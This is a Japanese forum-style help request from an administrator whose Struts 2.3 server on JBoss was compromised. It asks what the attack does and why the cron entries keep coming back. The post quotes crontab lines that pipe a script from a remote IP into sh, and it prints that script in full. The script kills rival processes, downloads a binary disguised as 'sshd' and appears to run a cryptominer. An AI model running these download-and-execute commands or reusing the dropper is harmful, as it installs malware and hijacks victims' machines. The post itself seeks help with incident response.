Struts2.3ゼロデイ攻撃が悪用された：CronJobが作成される

誰かがこの攻撃によって正確に何が行われているのかを理解するのを助けることができますか？ Jboss5環境でStruts2.3を使用していました。私はいくつかのcrontabをインストールしましたが、代わりにこれらの2行がcrontabに表示されました。

#*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh
#*/19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh

以下は、91.230.47.40から「wget」を介して取得されるlogo.jpgファイルにあるスクリプトです。

#!/bin/sh
rm -rf /var/tmp/jmpmxfyhiz.conf
ps auxf|grep -v grep|grep -v xxtyligbex|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "jmpmxfyhiz"|awk '{print $2}'|xargs kill -9
ps -fe|grep -e "xxtyligbex" -e "tmbllmjcex" -e "pclfzagbkh" -e "dqpuewpvxz" -e "gzvcdujihq" -e "bevgesdhbs"|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /var/tmp/xxtyligbex.conf
rm -rf /var/tmp/xxtyligbex.conf
curl -o /var/tmp/xxtyligbex.conf http://91.230.47.40/icons/kworker.conf
wget -O /var/tmp/xxtyligbex.conf http://91.230.47.40/icons/kworker.conf
chmod 777 /var/tmp/sshd
rm -rf /var/tmp/sshd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /var/tmp/sshd http://91.230.47.40/icons/kworker
wget -O /var/tmp/sshd http://91.230.47.40/icons/kworker
else
curl -o /var/tmp/sshd http://91.230.47.40/icons/kworker_na
wget -O /var/tmp/sshd http://91.230.47.40/icons/kworker_na
fi
chmod +x /var/tmp/sshd
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
sysctl -w vm.nr_hugepages=`$num`
Nohup ./sshd -c xxtyligbex.conf -t `echo $cores` >/dev/null &
Nohup ./sshd -c xxtyligbex.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi

これにより何が行われているのかを理解できるようにしてください。また、サーバーにマルウェアがインストールされている可能性を排除するのに役立ちます。脆弱性をカバーするために、プロジェクトをStruts 2.5に移動しました。それでも、私が削除してもcrontabは戻ってきます。